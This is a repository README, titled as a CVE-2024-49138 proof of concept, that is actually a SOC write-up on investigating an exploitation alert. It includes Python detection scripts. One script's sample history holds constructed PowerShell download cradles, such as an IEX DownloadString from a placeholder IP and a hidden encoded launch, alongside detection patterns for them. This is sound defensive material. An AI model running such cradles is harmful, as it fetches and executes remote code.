
CVE-2024-49138 PoC — Windows Common Log File System Driver Elevation of Privilege Vulnerability

Associated Vulnerability: Windows Common Log File System Driver Elevation of Privilege Vulnerability (CVE-2024-49138)
Readme
### Privilege Escalation Case - SOC335-CVE-2024-49138-Exploitation-Detected


## Alert Overview

### Affected Hostname:
- **Victor**

### Triggering Process:
- **scohost.exe**

### Parent Process:
- **`C:\Windows\System32\WINDOWSPOWERSHELL\V1.0\powershell.exe`**

### File Hash:
- **`b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9`**

### Trigger Reason:
- Unusual or suspicious patterns of behavior linked to the hash have been identified, indicating potential exploitation of **CVE-2024-49138**.

---

We start by investigating the alert we received, then check Log Management and Endpoint Security. Note that the triggering process name, `scohost.exe`, is a lookalike of the legitimate `svchost.exe`; a near-miss spelling of a core system binary is worth scrutiny on its own.

<img src="https://i.imgur.com/J6jEzDr.png" width="500">


There are multiple logon records from different OS types, for either the Admin or the Guest account, all showing Error Code: **0xC000006D**
<img src="https://i.imgur.com/vyq4J4o.png" width="500">

<img src="https://i.imgur.com/t6fX5rO.png" width="500">

### Error Code: **0xC000006D**
### Translation:
- **STATUS_LOGON_FAILURE**: the NTSTATUS reported for a failed logon (Security event 4625) when the username or password is wrong. The event's SubStatus field narrows the cause (for example 0xC000006A for a wrong password, 0xC0000064 for an unknown user), so a burst of these from one source against one or many accounts is the pattern to look for.
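As an added example (not part of the original write-up), the following script shows how a triage of these failed-logon records can be automated: it parses constructed 4625-style lines, translates the NTSTATUS codes, and flags a source that bursts against one account (brute force) or touches many accounts (password spray). The key=value log format, the host name, addresses, accounts and thresholds are all assumptions made for the example.

```python
"""Triage of failed-logon events carrying NTSTATUS 0xC000006D.

Added example: the log lines are constructed in the shape of a Windows
Security event 4625 and are not taken from the SOC alert on this page.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# NTSTATUS values seen in the Status/SubStatus fields of event 4625.
NTSTATUS = {
    0xC000006D: "STATUS_LOGON_FAILURE",
    0xC000006A: "STATUS_WRONG_PASSWORD",
    0xC0000064: "STATUS_NO_SUCH_USER",
    0xC0000234: "STATUS_ACCOUNT_LOCKED_OUT",
    0xC0000072: "STATUS_ACCOUNT_DISABLED",
}

# Constructed sample (assumed key=value export format; a real 4625 has
# separate Status and SubStatus fields). Only the host name matches the alert.
SAMPLE_LOG = """\
2024-12-10T09:00:01Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC000006D logon_type=3
2024-12-10T09:00:12Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC000006D logon_type=3
2024-12-10T09:00:25Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC000006D logon_type=3
2024-12-10T09:00:41Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC000006D logon_type=3
2024-12-10T09:01:03Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC000006D logon_type=3
2024-12-10T09:01:20Z host=Victor event=4625 user=Admin src=10.0.0.5 status=0xC0000234 logon_type=3
2024-12-10T09:02:00Z host=Victor event=4625 user=Guest src=10.0.0.9 status=0xC000006D logon_type=2
2024-12-10T09:03:00Z host=Victor event=4624 user=Admin src=10.0.0.5 status=0x0 logon_type=3
2024-12-10T09:05:00Z host=Victor event=4625 user=alice src=10.0.0.7 status=0xC000006D logon_type=3
2024-12-10T09:05:05Z host=Victor event=4625 user=bob src=10.0.0.7 status=0xC000006D logon_type=3
2024-12-10T09:05:10Z host=Victor event=4625 user=carol src=10.0.0.7 status=0xC000006D logon_type=3
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\d+) user=(?P<user>\S+) "
    r"src=(?P<src>\S+) status=(?P<status>0x[0-9A-Fa-f]+) logon_type=(?P<ltype>\d+)$"
)


def describe_status(code):
    """Translate an NTSTATUS value to its symbolic name."""
    return NTSTATUS.get(code, f"UNKNOWN_0x{code:08X}")


def parse(log_text):
    """Parse the key=value lines into dicts; malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        e["status"] = int(e["status"], 16)
        events.append(e)
    return events


def triage(log_text, threshold=5, window=timedelta(minutes=5), spray_users=3):
    """Summarise 4625 events: per-source bursts (brute force) and one
    source hitting many distinct accounts (password spray)."""
    failures = [e for e in parse(log_text) if e["event"] == "4625"]
    by_src = defaultdict(list)
    for e in failures:
        by_src[e["src"]].append(e)
    brute, spray = {}, {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        # Largest number of failures that fit inside one sliding time window.
        best, j = 0, 0
        for i in range(len(evs)):
            while evs[i]["ts"] - evs[j]["ts"] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            brute[src] = best
        users = sorted({e["user"] for e in evs})
        if len(users) >= spray_users:
            spray[src] = users
    return {
        "total_failures": len(failures),
        "status_counts": dict(Counter(describe_status(e["status"]) for e in failures)),
        "brute_force": brute,
        "password_spray": spray,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On a live host the same records come from `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625}`; the sliding-window count is what separates a handful of mistyped passwords from an automated attempt, and the account-lockout status (0xC0000234) in the middle of a burst is a useful confirmation that the source kept going after the account locked.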

### We then look into the hash provided in the alert.

<img src="https://i.imgur.com/JZY3ovS.png" width="500">

The hash is confirmed malicious; the report also gives the MITRE ATT&CK techniques and the observed malware behaviour.

<img src="https://i.imgur.com/voXLdWH.png" width="500">



### We then move to Terminal History and see suspicious activity.

<img src="https://i.imgur.com/LRT5LZ1.png" width="500">

We also spot a `$url` variable holding the URL visible in the screenshot, which is what the script retrieves.
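A `$url` assignment followed by a download is the classic PowerShell download cradle. As an added example (not code from the original write-up), the script below scans a constructed command history for cradle indicators, pulls out the URLs, and decodes an `-EncodedCommand` payload so the hidden command line can be read. The history lines, the URLs (RFC 5737 documentation addresses) and the payload are all constructed for the example.

```python
"""Scan a PowerShell command history for download cradles and extract URLs.

Added example. SAMPLE_HISTORY is constructed; it is not the terminal
history from the alert. The encoded line is built in code so the base64
is guaranteed to match PAYLOAD.
"""
import base64
import re

# Indicator groups, each with the regex that recognises it.
CRADLE_PATTERNS = {
    "Invoke-WebRequest": re.compile(r"\b(?:Invoke-WebRequest|iwr|wget|curl)\b", re.I),
    "WebClient.DownloadString/File": re.compile(r"DownloadString|DownloadFile", re.I),
    "Invoke-Expression": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "Start-BitsTransfer": re.compile(r"Start-BitsTransfer", re.I),
    "Bypass/Hidden flags": re.compile(
        r"-(?:ExecutionPolicy|ep)\s+Bypass|-w(?:indowstyle)?\s+hidden|-nop\b", re.I
    ),
}
URL_RE = re.compile(r"""https?://[^\s'"`)]+""", re.I)
VAR_URL_RE = re.compile(r"""\$url\s*=\s*['"]([^'"]+)['"]""", re.I)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Constructed payload and history (assumed, for the example only).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_HISTORY = [
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    "$url = 'http://203.0.113.10/stage/payload.exe'",
    "Invoke-WebRequest -Uri $url -OutFile C:\\Users\\Public\\payload.exe",
    "powershell.exe -nop -w hidden -ep Bypass -enc " + ENCODED,
    "Get-ChildItem C:\\Users\\Public",
]


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def analyze_history(lines):
    """Return one finding per line that carries a cradle indicator or a URL."""
    findings = []
    for n, line in enumerate(lines, 1):
        text, decoded = line, None
        m = ENC_RE.search(line)
        if m:
            try:
                decoded = decode_encoded_command(m.group(1))
                text = line + " " + decoded  # scan the decoded command too
            except (ValueError, UnicodeDecodeError):
                pass  # not valid base64/UTF-16; keep the raw line only
        hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
        urls = sorted(set(URL_RE.findall(text)) | set(VAR_URL_RE.findall(text)))
        if hits or urls:
            findings.append({"line": n, "techniques": hits, "urls": urls, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in analyze_history(SAMPLE_HISTORY):
        print(f)
```

The URLs this extracts are the values to pivot on in the sandbox report and in proxy or DNS logs; the `-enc` decoding matters because the visible command line of a hidden PowerShell often shows nothing but base64.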

### Having collected the information we need, we proceed with the playbook for this case.

<img src="https://i.imgur.com/5pYW4ql.png" width="500">

### We confirmed through Log Management and Endpoint Security that the malware has not been contained as of this moment.

<img src="https://i.imgur.com/YRnxmbf.png" width="500">

### The malware has been analyzed and confirmed malicious.

### The next step is to identify the C2 address.

<img src="https://i.imgur.com/o6hbi8p.png" width="500">

We checked the malware's behaviour in AnyRun and confirmed the C2 address, shown in the image below.

<img src="https://i.imgur.com/aSVWPhe.png" width="500">





## Command Analysis

### **Command 1**: `C:\Windows\System32\svchost.exe -k termsvcs -s TermService`

#### Explanation

1. **`C:\Windows\System32\svchost.exe`**:
   - **Service Host Process**: A core Windows system process used to host multiple Windows services implemented as dynamic-link libraries (DLLs).
   - Legitimately located in **`C:\Windows\System32\`**.

2. **`-k termsvcs`**:
   - Specifies the **service group** (`termsvcs`) for this instance of `svchost.exe`.
   - The `termsvcs` group is specifically related to Terminal Services.

3. **`-s TermService`**:
   - Specifies the exact service to start: **Remote Desktop Services (TermService)**.
   - This service allows remote connections to the computer, enabling the Remote Desktop Protocol (RDP).

#### Purpose of `TermService`

- **Remote Desktop Services**:
  - Manages remote desktop connections, including user sessions over RDP.
  - Essential for enabling remote administration or remote desktop features.

---

### **Command 2**: `C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule`

#### Explanation

1. **`C:\Windows\system32\svchost.exe`**:
   - **Service Host Process**: A critical Windows system process used to host services implemented as dynamic-link libraries (DLLs).
   - Verify the image path: a `svchost.exe` running from anywhere other than **`C:\Windows\system32\`** (or a lookalike name such as `scohost.exe`) is suspect.

2. **`-k netsvcs`**:
   - Specifies the **service group** (`netsvcs`) that this instance of `svchost.exe` is hosting.
   - The `netsvcs` group typically includes networking-related and other essential services.

3. **`-p`**:
   - Tells `svchost.exe` to apply the process mitigation policies (code-integrity and related restrictions) configured for the hosted service; the switch appeared with Windows 10.
   - It has nothing to do with persistence or automatic restart. Whether a service is restarted after a failure is set in its recovery options in the Service Control Manager, not on the command line.

4. **`-s Schedule`**:
   - Specifies a specific service within the group to load: **Task Scheduler** (`Schedule`).
   - The Task Scheduler service manages tasks that run at specific times or in response to certain triggers.

5. **Process ID**:
   - **1996** is the **Process ID (PID)** for the instance of `svchost.exe` managing the Task Scheduler service.

---

### **Command 3**: `C:\Windows\system32\svchost.exe -k DcomLaunch -p`

#### Explanation

1. **`C:\Windows\system32\svchost.exe`**:
   - **Service Host Process**: A core Windows system process that acts as a host for running multiple services from dynamic-link libraries (DLLs).

2. **`-k DcomLaunch`**:
   - Specifies the **service group** the process is hosting.
   - **DcomLaunch**: Refers to the **DCOM Server Process Launcher**, responsible for launching Distributed Component Object Model (DCOM) services.

3. **`-p`**:
   - As with the Task Scheduler instance above, this tells `svchost.exe` to apply the process mitigation policies configured for the hosted service; it does not mean the process is "persistent" or auto-restarted.

#### Purpose of `DcomLaunch`

- **System Component**: Vital for many Windows operations, such as enabling communication between applications, activating processes, and handling system-level RPC requests.
- **Dependencies**: Many core services, including Windows Update and COM-related applications, rely on this process.

---
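The three command lines above share one shape: a real `svchost.exe` lives in `System32`, is started by `services.exe`, and carries a `-k` group that the SCM knows about. As an added example (not code from the original write-up), the script below parses svchost-style command lines and checks each process record against those expectations, including an edit-distance test that catches the alert's `scohost.exe` lookalike. The records are constructed from the three legitimate command lines plus invented suspicious variants; the service-group allowlist is an assumption for the example (in production derive it from the `SvcHost` registry key under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion`).

```python
"""Sanity checks for svchost.exe-shaped process records.

Added example, not the page's or any vendor's code. SAMPLE_RECORDS and
KNOWN_GROUPS are constructed for illustration.
"""

LEGIT_IMAGE = r"c:\windows\system32\svchost.exe"
EXPECTED_PARENT = "services.exe"
# Service groups and the -s services the page's command lines show for them
# (assumed allowlist; a real one comes from the SvcHost registry key).
KNOWN_GROUPS = {"termsvcs": {"TermService"}, "netsvcs": {"Schedule"}, "DcomLaunch": set()}

# Constructed process-creation records: three legitimate, three suspicious.
SAMPLE_RECORDS = [
    {"cmdline": r"C:\Windows\System32\svchost.exe -k termsvcs -s TermService", "parent": "services.exe"},
    {"cmdline": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule", "parent": "services.exe"},
    {"cmdline": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p", "parent": "services.exe"},
    {"cmdline": r"C:\Users\Public\scohost.exe -k netsvcs", "parent": "powershell.exe"},
    {"cmdline": r"C:\Windows\Temp\svchost.exe -k netsvcs -s Schedule", "parent": "explorer.exe"},
    {"cmdline": r"C:\Windows\System32\svchost.exe -k evilgrp -s Updater", "parent": "services.exe"},
]


def edit_distance(a, b):
    """Levenshtein distance; small values against 'svchost.exe' mean a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def parse_cmdline(cmd):
    """Split an svchost command line into image path and the -k/-s/-p options."""
    parts = cmd.split()
    opts = {"k": None, "s": None, "p": False}
    i = 1
    while i < len(parts):
        tok = parts[i].lower()
        if tok == "-k" and i + 1 < len(parts):
            opts["k"], i = parts[i + 1], i + 2
        elif tok == "-s" and i + 1 < len(parts):
            opts["s"], i = parts[i + 1], i + 2
        elif tok == "-p":
            opts["p"], i = True, i + 1
        else:
            i += 1
    return parts[0], opts


def check_process(rec):
    """Return a list of findings for one record; an empty list means it looks legitimate."""
    findings = []
    image, opts = parse_cmdline(rec["cmdline"])
    name = image.rsplit("\\", 1)[-1].lower()
    if name != "svchost.exe":
        d = edit_distance(name, "svchost.exe")
        if d > 2:
            return findings  # not svchost-shaped; out of scope for this check
        findings.append(f"lookalike image name {name!r} ({d} edit(s) from svchost.exe)")
    elif image.lower() != LEGIT_IMAGE:
        findings.append(f"svchost.exe loaded from unexpected path {image}")
    if opts["k"] is None:
        findings.append("no -k service group on the command line")
    elif opts["k"] not in KNOWN_GROUPS:
        findings.append(f"unknown service group {opts['k']!r}")
    elif opts["s"] and opts["s"] not in KNOWN_GROUPS[opts["k"]]:
        findings.append(f"service {opts['s']!r} not expected in group {opts['k']!r}")
    if rec["parent"].lower() != EXPECTED_PARENT:
        findings.append(f"unexpected parent {rec['parent']} (expected {EXPECTED_PARENT})")
    return findings


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["cmdline"], "->", check_process(rec) or "OK")
```

The parent-process check is the one that fires on this case regardless of the file name: a service host spawned by `powershell.exe` rather than `services.exe` is wrong even when the path and the `-k` group look right.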

## Taskhostw.exe and Key Roaming

### **`taskhostw.exe`**
- **Host Process for Windows Tasks**: a generic host process that runs DLL-based scheduled tasks.
- **Location**: The legitimate executable is located in **`C:\Windows\System32\`**.

### **Key Roaming**
- A Windows feature enabling **credential roaming** for certificates and private keys across devices in an Active Directory environment.

### Connection:
- `taskhostw.exe` running the key-roaming task is expected background activity that syncs certificate credentials in an Active Directory environment; on its own it is baseline behaviour, not an indicator. Treat it as suspicious only if the binary runs from outside `C:\Windows\System32\`, has an unusual parent, or carries a command line that does not match the scheduled task.



File Snapshot: README.md (5.6K) only; 0 directories, 1 file. The repository contains no exploit code beyond this README.